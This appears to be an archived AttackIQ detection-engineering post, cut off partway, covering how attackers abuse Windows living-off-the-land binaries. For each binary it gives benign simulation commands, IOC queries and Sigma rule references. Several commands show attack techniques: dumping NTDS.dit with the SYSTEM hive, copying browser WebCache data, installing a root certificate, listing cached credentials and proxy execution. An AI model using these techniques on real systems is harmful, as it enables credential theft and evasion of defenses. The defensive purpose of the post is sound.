{
	"id": "d106440f-7731-4784-b69b-c6f26583386d",
	"created_at": "2026-04-06T00:06:58.917532Z",
	"updated_at": "2026-04-10T13:12:34.189301Z",
	"deleted_at": null,
	"sha1_hash": "ddb9d132d9af5d74f0fb6b8cd6c3f8f829fdca55",
	"title": "Monitoring and Testing for Living-Off-the-Land Binaries - AttackIQ",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 14383305,
	"plain_text": "Monitoring and Testing for Living-Off-the-Land Binaries - AttackIQ\r\nBy Federico Quattrin\r\nPublished: 2023-03-16 · Archived: 2026-04-05 13:00:49 UTC\r\nSpecifically, LOLBins, or Living-Off-the-Land Binaries, are binaries local to the operating system and traditionally seen as\r\nnon-malicious, but can be exploited beyond their supposed function by adversaries to accomplish their malicious goals. The\r\nday-to-day commonality of LOLBins inadvertently serve as a pseudo cloak of invisibility, allowing the attacker to act\r\ninconspicuously across the cyber kill chain and under the nose of SOC teams and intrusion detection tools. On top of this,\r\nLOLBins are often fileless, and do not leave the tracks that foreign code or files typically leave behind.\r\nLOLBins pose a growing threat that should not be taken lightly, and it is an organizational oversight if not monitored. To\r\nhelp organizations combat this risk, AttackIQ has released ATT\u0026CK-aligned scenarios to test against LOLBins. Using the\r\nAttackIQ Security Optimization Platform, security teams can improve their cybersecurity readiness through continuous\r\ntesting and security control validation, running assessments aligned to the MITRE ATT\u0026CK framework against the total\r\nsecurity program.\r\nIn this post, we have captured a number of LOLBin behaviors to look out for, in hopes that detection engineers and SOC\r\nanalysts will come to recognize the signs associated with these attacks and have a means for detecting the behaviors.\r\nPlease note that we have demonstrated the generalized adversary behavior in each example, but be mindful that the\r\nadversary may execute a slightly different variation than the ones that we have outlined below. In addition, as a Breach and\r\nAttack Simulation solution, the steps and commands detailed are how the scenarios would be executed benignly within our\r\nplatform and under our “do no harm” model.\r\nIf you are interested in exploring other examples of binaries not outlined in this post, more can be found in the LOLBAS\r\nproject on GitHub, which we used as a reference resource and where much of our research for these templates is derived.\r\nAtbroker.exe\r\nBinary description\r\nAtbroker.exe is a Microsoft Windows system executable file that stands for “Assistive Technology Manager Broker”. It is a\r\npart of the Windows Accessibility features and is responsible for managing the interactions between the Windows operating\r\nsystem and assistive technologies, such as screen readers, magnifiers, and other accessibility tools.\r\nAtbroker.exe is designed to run in the background and starts automatically when a user logs in to Windows. It monitors the\r\naccessibility settings and programs that are running on the system, and provides a way for assistive technology applications\r\nto interact with the desktop and user interface.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nPrivilege Escalation: Event Triggered Execution: Accessibility Features (T1546.008)\r\nPersistence: Event Triggered Execution: Accessibility Features (T1546.008)\r\nHow do the adversaries use it?\r\nAdversaries can use Atbroker.exe to create a new accessibility feature that is designed to launch a binary such as cmd.exe or\r\nmalware. Once the new accessibility feature is created, the attacker can trigger it and gain access to the command prompt\r\nwith elevated privileges or execute the binary that was defined.\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 1 of 50\n\nBy using this technique, adversaries can bypass the need for administrative credentials and gain access to sensitive parts of\nthe system.\nAttackIQ Scenarios\nSystem Binary Proxy Execution using “atbroker.exe” Script\nDescription\nAttackIQ has released the scenario “System Binary Proxy Execution using “atbroker.exe” Script”. This scenario will create a\nnew registry key in the “HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs” key.\nThe key will have a name composed of the string “AttackIQ_” and 15 random characters.\nThe key will contain the following subkeys:\n‘ApplicationName’: “@%SystemRoot%\\system32\\AccessibilityCPL.dll,-83”\n‘ATExe’: “$pwd\\AIQ_file_creator.exe”\n‘CopySettingsToLockedDesktop’: 1\n‘Description’: “AIQ key for execution.”\n‘Profile’: ‘ ‘\n‘SimpleProfile’: “test”\n‘StartExe’: “$pwd\\AIQ_file_creator.exe”\n‘TerminateOnDesktopSwitch’: 0\nWhere the $pwd variable will point to the scenario’s current working directory.\nIf the scenario is able to create the keys, it will then execute the following command:\nATBroker.exe /start $name\nWhere $name is the name of the registry key present in the “HKLM:\\SOFTWARE\\Microsoft\\Windows\nNT\\CurrentVersion\\Accessibility\\ATs” key.\nThe binary AIQ_file_creator.exe will create a file in the temp directory.\nExecution\n(Click for Larger)\nScenario IOCs\n[(((process:command_line NOT LIKE '%animations%' AND process:command_line NOT LIKE '%audiodescription%' AND\nprocess:command_line NOT LIKE '%caretbrowsing%' AND process:command_line NOT LIKE '%caretwidth%' AND\nprocess:command_line NOT LIKE '%colorfiltering%' AND process:command_line NOT LIKE '%cursorscheme%' AND\nprocess:command_line NOT LIKE '%filterkeys%' AND process:command_line NOT LIKE '%focusborderheight%' AND\nprocess:command_line NOT LIKE '%focusborderwidth%' AND process:command_line NOT LIKE '%highcontrast%' AND\nprocess:command_line NOT LIKE '%keyboardcues%' AND process:command_line NOT LIKE '%keyboardpref%' AND\nprocess:command_line NOT LIKE '%magnifierpane%' AND process:command_line NOT LIKE '%messageduration%' AND\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\nPage 2 of 50\n\nprocess:command_line NOT LIKE '%minimumhitradius%' AND process:command_line NOT LIKE '%mousekeys%' AND\r\nprocess:command_line NOT LIKE '%Narrator%' AND process:command_line NOT LIKE '%osk%' AND process:command_line\r\nNOT LIKE '%overlappedcontent%' AND process:command_line NOT LIKE '%showsounds%' AND process:command_line NOT\r\nLIKE '%soundsentry%' AND process:command_line NOT LIKE '%stickykeys%' AND process:command_line NOT LIKE\r\n'%togglekeys%' AND process:command_line NOT LIKE '%windowarranging%' AND process:command_line NOT LIKE\r\n'%windowtracking%' AND process:command_line NOT LIKE '%windowtrackingtimeout%' AND process:command_line NOT\r\nLIKE '%windowtrackingzorder%')) AND (process:binary_ref.name LIKE '%AtBroker.exe' AND process:command_line LIKE\r\n'%start%'))]\r\n[(((process:binary_ref.name != 'C:\\Windows\\system32\\atbroker.exe' OR windows-registry-key:key NOT LIKE\r\n'%\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration%' OR windows-registry-key:values[*].data !=\r\n'(Empty)') AND (process:binary_ref.name NOT LIKE 'C:\\Windows\\Installer\\MSI%' OR windows-registry-key:key NOT\r\nLIKE '%Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs%')) AND (windows-registry-key:key LIKE\r\n'%Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs%' OR windows-registry-key:key LIKE\r\n'%Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\natbroker.exe → AIQ_file_creator.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml\r\n/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml\r\nBack to Top\r\nCertutil.exe\r\nBinary description\r\nCertutil.exe is a command-line utility program that is included with Microsoft Windows operating systems. It is used to\r\nmanage digital certificates and certificate revocation lists (CRLs) in a Windows environment.\r\nCertutil.exe can be used to perform various tasks related to digital certificates, such as generating and installing certificates,\r\nbacking up and restoring certificates, verifying and validating certificates, and publishing certificates and CRLs to Active\r\nDirectory or other network directories.\r\nThis tool is commonly used by system administrators and security professionals to manage the security of a Windows\r\nenvironment, including securing web servers, email servers, and other network services that require the use of digital\r\ncertificates for authentication and encryption.\r\nTTPs and tactics\r\nDefense Evasion: Subvert Trust Controls: Install Root Certificate (T1553.004)\r\nHow do the adversaries use it?\r\nA malicious actor could use Certutil.exe to install fake or malicious certificates on a Windows system, which could be used\r\nto conduct man-in-the-middle attacks, intercept encrypted traffic, or impersonate legitimate websites or services.\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 3 of 50\n\nAttackIQ Scenarios\r\nInstall Root Certificate using “certutil.exe” Script\r\nDescription\r\nThe scenario will execute the following command:\r\ncertutil.exe -v -addstore -f ROOT aiq_certificate.pem\r\nThe scenario will be marked as Not Prevented if it is capable of adding the certificate.\r\nThis scenario requires administrator privileges.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\CertMgr.exe' AND process:command_line LIKE '%/add%' AND\r\nprocess:command_line LIKE '%root%') OR (process:binary_ref.name LIKE '%\\certutil.exe' AND process:command_line\r\nLIKE '%-addstore%' AND process:command_line LIKE '%root%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\ncertutil.exe\r\n(Click for Larger)\r\nSigma Rules\r\nrules/windows/process_creation/proc_creation_win_root_certificate_installed.yml\r\nBack to Top\r\nCmdkey.exe\r\nBinary description\r\nCmdkey.exe is a built-in Windows command-line tool that allows you to manage and manipulate stored credentials, such as\r\nusernames and passwords. It is primarily used to manage credentials for remote connections to other computers, servers, or\r\nnetwork resources.\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 4 of 50\n\nWith cmdkey.exe, you can add, list, modify, and remove stored credentials.\r\nTTPs and tactics\r\nCredential Access: Credentials from Password Stores (T1555)\r\nHow do the adversaries use it?\r\nCmdkey.exe can be used by attackers to access and extract stored credentials on a victim’s machine, which can then be used\r\nfor lateral movement or privilege escalation.\r\nAttackIQ Scenarios\r\nDiscovery of Cached Credentials using “cmdkey.exe” Command\r\nDescription\r\nThis particular scenario will execute the following command:\r\ncmdkey.exe /list\r\nThe scenario will be marked as Not Prevented if there are cached credentials of the type Domain Password.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\cmdkey.exe') AND (process:command_line LIKE '% /l%' OR process:command_line\r\nLIKE '% -l%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → cmdkey.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 5 of 50\n\nBack to Top\r\nControl.exe\r\nBinary description\r\nControl.exe is a Windows operating system program that allows users to access and manage various system settings and\r\ntools through the Control Panel.\r\nWhen you run control.exe, it opens the Control Panel, which contains various applets for configuring and managing system\r\nsettings, such as adding or removing hardware, setting up network connections, configuring display settings, and more.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution: Control Panel (T1218.002)\r\nHow do the adversaries use it?\r\nThreat actors could potentially abuse control.exe to execute a DLL by taking advantage of the way that control.exe interacts\r\nwith Windows and the Control Panel.\r\nControl.exe is designed to open specific applets in the Control Panel based on the name or GUID of the applet that is\r\nprovided to it as a parameter. However, it is possible to use control.exe to execute a DLL by specifying the path of the DLL\r\nas the parameter instead of the name or GUID of an applet.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “control.exe” Script\r\nDescription\r\nThis scenario will then execute the following command:\r\ncontrol.exe AttackIQ_DLL.dll\r\nThe DLL file will create a file in the temp directory when loaded.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. The scenario will be marked as prevented if\r\nthe file does not exist.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 6 of 50\n\n[(((process:binary_ref.name LIKE '%\\rundll32.exe') AND process:parent_ref.binary_ref.name LIKE\r\n'%\\System32\\control.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\ncontrol.exe → rundll32.exe\r\n(Click for Larger)\r\nSigma Rules\r\nIn order to detect this scenario you will need to delete the filter in this rule:\r\n/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml\r\nBack to Top\r\nCsc.exe\r\nBinary description\r\ncsc.exe is a command-line tool used to compile C# (C Sharp) source code into executable programs or DLLs (dynamic link\r\nlibraries). It is included in the Microsoft .NET Framework SDK (Software Development Kit) and can be found in the .NET\r\nFramework directory on a Windows computer.\r\nTTPs and tactics\r\nDefense Evasion: Obfuscated Files or Information: Compile After Delivery (T1027.004)\r\nHow do the adversaries use it?\r\nAn attacker can deliver a source code file containing the malicious code to the target system and then use csc.exe to compile\r\nthe code into an executable file. By compiling the code on the target system, the attacker can avoid detection by security\r\nsoftware that may have signatures or behavioral patterns for known malicious executables.\r\nThe use of csc.exe in this context requires that the attacker has already gained access to the target system and has the\r\nnecessary permissions to execute the compiler. Once the code is compiled, the attacker can execute it to achieve their\r\nmalicious goals, such as stealing sensitive data or taking control of the compromised system.\r\nAttackIQ Scenarios\r\nCompile After Delivery using “csc.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 7 of 50\n\ncsc.exe -out:aiq_cs_code.exe aiq_cs_code.cs\r\nThe content of the aiq_vb_code.vb is:\r\nusing System;\r\nclass Program\r\n{\r\nstatic void Main()\r\n{\r\nConsole.WriteLine(\"AttackIQ binary has been spawned.\");\r\n}\r\n}\r\nAfter compiling the binary, the scenario will execute the compiled file and search for the message in the stdout.\r\nThe scenario will be marked as Not Prevented if the message “AttackIQ binary has been spawned” is present in the stdout of\r\nthe compiled binary execution.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[((process:parent_ref.binary_ref.name LIKE '%\\wscript.exe' OR process:parent_ref.binary_ref.name LIKE\r\n'%\\cscript.exe' OR process:parent_ref.binary_ref.name LIKE '%\\mshta.exe' OR process:parent_ref.binary_ref.name\r\nLIKE '%\\powershell.exe') AND process:binary_ref.name LIKE '%\\csc.exe')]\r\nBinary process tree\r\ncsc.exe will have the following process tree:\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\ncsc.exe → cvtres.exe\r\non the other hand, the compiled binary (aiq_cs_code.exe) will have the following one:\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\naiq_cs_code.exe\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 8 of 50\n\n(Click for Larger)\r\nSigma Rules\r\nIn order to detect the scenario you will need to add powershell as a parent process to the following rule:\r\n/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml\r\nBack to Top\r\nCscript.exe\r\nBinary description\r\ncscript.exe is a command-line script execution engine in Microsoft Windows operating systems. It is used to execute scripts\r\nwritten in various scripting languages, including VBScript and JScript, and is included as a part of the Windows Script Host\r\n(WSH).\r\nTTPs and tactics\r\nExecution: Command and Scripting Interpreter: Visual Basic (T1059.005)\r\nExecution: Command and Scripting Interpreter: JavaScript (T1059.007)\r\nHow do the adversaries use it?\r\nAn adversary could use cscript.exe to run malicious scripts on a target system. This could include scripts designed to steal\r\nsensitive information, compromise system security, or carry out other malicious actions.\r\nAttackIQ Scenarios\r\nWindows Cscript Script Execution\r\nDescription\r\nWith this scenario and FireDrill architecture you have a reliable and secure way to execute your custom tasks when needed.\r\nYou can upload a script file and decide what interpreter you want to use. Examples of interpreters would be python.exe,\r\ncmd.exe, powershell.exe, sh, bash, etc. You can specify the full path of the interpreter, if its location is stored in the asset’s\r\nenvironment you can specify only the name as shown before. Environment variables such as %System% can also be used.\r\nBy using cscript.exe as interpreter, you could execute either VBScripts of JScripts.\r\nIf the uploaded script uses parameters that have to be sent for its execution, you can specify them as a string in the scenario\r\n“Parameters” parameter.\r\nIt is possible to upload support files to be used within the script, these files will be located in the current working directory\r\nso the script will only require knowing the filename in order to access to them.\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 9 of 50\n\nThe supported platform parameter ensures that the script only will be executed on the selected platform.\r\nScript Hash parameter can be specified to enforce the script file to match a given SHA256 hash (lowercase), the scenario\r\nwill error and the script will not be executed if the provided hash does not match with the script’s hash. No hash validation\r\nwill be performed if this parameter is not filled.\r\nThere is also a feature that enables to execute the script as a logged in user, instead of executing the script as SYSTEM user.\r\nThis feature is available only for Windows agents.\r\nFinally, the scenario success can be defined either by checking the script exit code or by defining a pattern. If a pattern is\r\nchosen, the output of the script will be written into a temporal file and the pattern will be searched inside it. The pattern\r\naccepts regular expressions.\r\nExecution\r\n(Click for Larger)\r\nIn order to execute this scenario you will need to provide a JScript script or a VSBscript.\r\nIn this demo example, we have provided the following script:\r\n// This script displays a message box with a custom message var message = \"AttackIQ script has been\r\nexecuted.\"; WScript.Echo(message);\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\wscript.exe' OR process:binary_ref.name LIKE '%\\cscript.exe') AND\r\n(process:command_line LIKE '%.jse%' OR process:command_line LIKE '%.vbe%' OR process:command_line LIKE '%.js%'\r\nOR process:command_line LIKE '%.vba%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → cscript.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_susp_script_execution.yml\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 10 of 50\n\nBack to Top\r\nEsentutl.exe\r\nBinary description\r\nEsentutl.exe is a command-line tool used to manage Extensible Storage Engine (ESE) databases in Microsoft Windows\r\noperating systems. ESE is a database engine developed by Microsoft that is used by various Microsoft applications,\r\nincluding Active Directory, Exchange Server, Windows Search, and Windows Update.\r\nEsentutl.exe can be used to perform a variety of tasks related to ESE databases, such as creating and repairing databases,\r\ncompacting and defragmenting databases, and checking the integrity of databases. It can also be used to recover data from\r\ndamaged databases and to export and import data from ESE databases.\r\nTTPs and tactics\r\nCredential Access: Credentials from Password Stores: Credentials from Web Browsers (T1555.003)\r\nCredential Access: OS Credential Dumping: NTDS (T1003.003)\r\nCommand and Control: Ingress Tool Transfer (T1105)\r\nHow do the adversaries use it?\r\nEsentutl.exe could potentially be used by an attacker to:\r\nextract saved login credentials from the Web Cache Files (WCF) of Internet Explorer, which is stored in an ESE\r\ndatabase format. An attacker could use the “esentutl.exe” command-line tool to access the ESE database and extract\r\nthe saved login credentials from the WCF file. The attacker could then use these credentials to gain access to the\r\nvictim’s online accounts.\r\ndump the contents of the NTDS.dit file on a compromised domain controller. The NTDS.dit file is an ESE database\r\nused by Active Directory to store information about user accounts and passwords. An attacker could use the\r\n“esentutl.exe” command-line tool to extract password hashes from the NTDS.dit file, which could then be used for\r\noffline password cracking or pass-the-hash attacks.\r\ncopy a file into the system.\r\nAttackIQ Scenarios\r\nDump Active Directory Database using Volume Shadow Copy via esentutl.exe\r\nDescription\r\nThis scenario will perform the following actions:\r\nCopy the locked  NTDS.dit  file by creating a Volume Shadow Copy using esentutl.exe\r\nIf the previous step was successful, dump the SYSTEM registry hive using  reg.exe  binary.\r\nIf both the  NTDS.dit  file and the SYSTEM registry hive are successfully retrieved, the scenario result will be Not\r\nPrevented. Otherwise, it will be Prevented.\r\nImportant notes:\r\nFor the scenario to be successful, it must be executed on a Domain Controller. Otherwise, the NTDS.dit file won’t\r\nbe present in the system and the scenario will end with a Requirements not met error.\r\nThis scenario requires esentutl.exe version 10.0. This built-in Windows tool version is present in Windows Server\r\n2016 or newer.\r\nExecution\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 11 of 50\n\n(Click for Larger)\r\nCopy a file using “esentutl.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nesentutl.exe /y helloworld.exe /d $env:temp\\$name /o\r\nThe scenario will be marked as Not Prevented if the file is copied into the destination path.\r\nExecution\r\n(Click for Larger)\r\nCollect Browser Data via Esentutl using Powershell Script\r\nDescription\r\nThis scenario will execute a PowerShell script that will iterate through each user profile on the system and attempt to flush\r\nthe data from the  WebCache  log files back to the  WebCacheV01  database using the  esentutl  utility. Once the data has\r\nbeen flushed, a copy of the database will be made to a temporary directory.\r\nThe scenario’s outcome will be set to Not Prevented if the script is able to flush and make a copy of a\r\nuser’s  WebCache  database. The scenario will be set to Prevented if none of the user profiles have an existing database or if\r\nthe script fails for any reason.\r\nTo execute the scenario correctly, it’s important to make sure that a  WebCache  database exists for at least one of the user\r\nprofiles. The database is typically locked by Windows if the user for that profile is currently logged in to the system and the\r\nscenario may end with a false prevention.\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 12 of 50\n\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%esentutl.exe' AND windows-registry-key:key LIKE\r\n'%System\\CurrentControlSet\\Services\\VSS%') AND (windows-registry-key:key NOT LIKE\r\n'%System\\CurrentControlSet\\Services\\VSS\\Start%'))]\r\n[((file:name LIKE '%.exe' OR file:name LIKE '%.dll' OR file:name LIKE '%.ocx' OR file:name LIKE '%.zip' OR\r\nfile:name LIKE '%.rar' OR file:name LIKE '%.7z' OR file:name LIKE '%.diagcab' OR file:name LIKE '%.appx' OR\r\nfile:name LIKE '%.ps1' OR file:name LIKE '%.bat' OR file:name LIKE '%.vbs' OR file:name LIKE '%.scf' OR\r\nfile:name LIKE '%.wsf' OR file:name LIKE '%.wsh') AND (process:binary_ref.name LIKE '%\\esentutl.exe'))]\r\n[((process:binary_ref.name LIKE '%\\esentutl.exe') AND (process:command_line LIKE '%/r%' OR\r\nprocess:command_line LIKE '%-r%') AND process:command_line LIKE '%\\Windows\\WebCache%')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nesentutl.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_exe.yml\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml\r\n/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml\r\nBack to Top\r\nExpand.exe\r\nBinary description\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 13 of 50\n\nexpand.exe is a command-line tool used in Microsoft Windows operating systems to extract files and folders from a\r\ncompressed cabinet (.cab) file. Cabinet files are archives used to store system files, drivers, and other components. The\r\nexpand.exe utility is included in all versions of Windows, and it can be used to extract individual files, groups of files, or an\r\nentire cab file.\r\nTTPs and tactics\r\nCommand and Control: Ingress Tool Transfer (T1105)\r\nHow do the adversaries use it?\r\nexpand.exe could be used to copy a file into the file system.\r\nAttackIQ Scenarios\r\nCopy a file using “expand.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nexpand.exe helloworld.exe $env:temp\\$name\r\nThe scenario will be marked as Not Prevented if the file is copied into the destination path.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[((file:name LIKE '%.exe' OR file:name LIKE '%.dll' OR file:name LIKE '%.ocx' OR file:name LIKE '%.zip' OR\r\nfile:name LIKE '%.rar' OR file:name LIKE '%.7z' OR file:name LIKE '%.diagcab' OR file:name LIKE '%.appx' OR\r\nfile:name LIKE '%.ps1' OR file:name LIKE '%.bat' OR file:name LIKE '%.vbs' OR file:name LIKE '%.scf' OR\r\nfile:name LIKE '%.wsf' OR file:name LIKE '%.wsh') AND (process:binary_ref.name LIKE '%\\expand.exe'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nexpand.exe\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 14 of 50\n\n(Click for Larger)\r\nSigma Rules\r\nThe following rules should be modified uncommenting – \\expand.exe\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_exe.yml\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml\r\nBack to Top\r\nBinary description\r\nExtrac32.exe is a command-line tool included with Microsoft Windows operating systems. It is used to extract files from\r\nMicrosoft Cabinet (.cab) files. Cabinet files are a type of archive file that is commonly used for distributing software\r\nupdates, drivers, and other types of system files.\r\nTTPs and tactics\r\nCommand and Control: Ingress Tool Transfer (T1105)\r\nHow do the adversaries use it?\r\nextrac32.exe could be used to copy a file into the file system.\r\nAttackIQ Scenarios\r\nDescription\r\nThis scenario will execute the following command:\r\nextrac32.exe /C helloworld.exe $env:temp\\$name\r\nThe scenario will be marked as Not Prevented if the file is copied into the destination path.\r\nExecution\r\n(Click for Larger)\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 15 of 50\n\nScenario IOCs\r\n[((file:name LIKE '%.exe' OR file:name LIKE '%.dll' OR file:name LIKE '%.ocx' OR file:name LIKE '%.zip' OR\r\nfile:name LIKE '%.rar' OR file:name LIKE '%.7z' OR file:name LIKE '%.diagcab' OR file:name LIKE '%.appx' OR\r\nfile:name LIKE '%.ps1' OR file:name LIKE '%.bat' OR file:name LIKE '%.vbs' OR file:name LIKE '%.scf' OR\r\nfile:name LIKE '%.wsf' OR file:name LIKE '%.wsh') AND (process:binary_ref.name LIKE '%\\extrac32.exe'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nexpand.exe\r\n(Click for Larger)\r\nSigma Rules\r\nAdd extrac32.exe to the following rules:\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_exe.yml\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml\r\n/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml\r\nBack to Top\r\nForfiles.exe\r\nBinary description\r\nforfiles.exe is a computer software utility for Microsoft Windows, which selects files and runs a command on them. File\r\nselection criteria include name and last modified date. The command specifier supports some special syntax options. It can\r\nbe used directly on the command-line, or in batch files or other scripts.\r\nTTPs and tactics\r\nDefense Evasion: Indirect Command Execution (T1202)\r\nHow do the adversaries use it?\r\nForfiles can be used to subvert controls and possibly conceal command execution by not directly invoking cmd.\r\nAttackIQ Scenarios\r\nIndirect Command Execution through “forfiles.exe” Command\r\nDescription\r\nThe scenario executes the following command:\r\npowershell.exe forfiles /p c:\\windows\\system32 /m notepad.exe /c $pwd\\AIQ_pid_binary.exe\r\nWhere AIQ_pid_binary.exe is a binary that will print a message and its process id.\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 16 of 50\n\nThe scenario will be marked as not prevented if the pattern “AttackIQ binary has been spawned” is present in the stdout.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\forfiles.exe') AND (process:command_line LIKE '% /c %' OR\r\nprocess:command_line LIKE '% -c %') AND (process:command_line LIKE '% /m %' OR process:command_line LIKE '% -m\r\n%') AND (process:command_line LIKE '% /p %' OR process:command_line LIKE '% -p %'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe →\r\nforfiles.exe → AIQ_pid_binary.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml\r\nBack to Top\r\nFtp.exe\r\nBinary description\r\nftp.exe is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP).\r\nTTPs and tactics\r\nHow do the adversaries use it?\r\nAdversaries can use it to transfer other tools onto a system, execute commands, or exfiltrate data.\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 17 of 50\n\nAttackIQ Scenarios\r\nIndirect Command Execution through “forfiles.exe” Command\r\nDescription\r\nThis particular scenario involves downloading a text file containing commands to be run with ftp.exe and also downloading\r\na custom binary that, when executed, sends data to the standard output. The scenario then executes these commands using\r\nthe following command:\r\nftp.exe -s:ftpcommands.txt\r\nThe scenario will be marked as not prevented if the pattern “AttackIQ binary has been spawned” is present in the stdout.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[(((process:binary_ref.name LIKE '%\\ftp.exe') AND process:command_line LIKE '%-s:%') OR\r\nprocess:parent_ref.binary_ref.name LIKE '%\\ftp.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → ftp.exe\r\n(Click for Larger)\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml\r\nBack to Top\r\nIe4uinit.exe\r\nBinary description\r\nhttps://www.attackiq.com/2023/03/16/hiding-in-plain-sight/\r\nPage 18 of 50\n\nie4uinit.exe is a Windows system file that is used to initialize some of the settings for Internet Explorer. Specifically, it is\r\nresponsible for configuring user-specific settings related to Internet Explorer, such as browser history, default browser\r\nsettings, and other related settings.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nHow do the adversaries use it?\r\nWhen ie4uinit is called with the parameter -Base-Settings it will call a .inf file called ie4uinit.inf that should be present in\r\nthe same working directory as the ie4uinit.exe.\r\nAn adversary could copy this binary into a custom working directory and then call it and load a custom .INF file.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “ie4uinit.exe” Script\r\nDescription\r\nIn this scenario, the following actions will take place:\r\nThe ie4uinit.exe file will be copied from the System32 folder to the working directory where supporting files are\r\nstored.\r\nThe ie4uinit.exe binary will be called with the ‘-Base-Settings’ parameters.\r\nA 5-second wait period will occur.\r\nThe system will check for the presence of the attackiq_ie4uinit.txt file in the working directory. If it is present, the\r\nscenario has been successful. If not, the scenario will be prevented.\r\nClean-up procedures will be carried 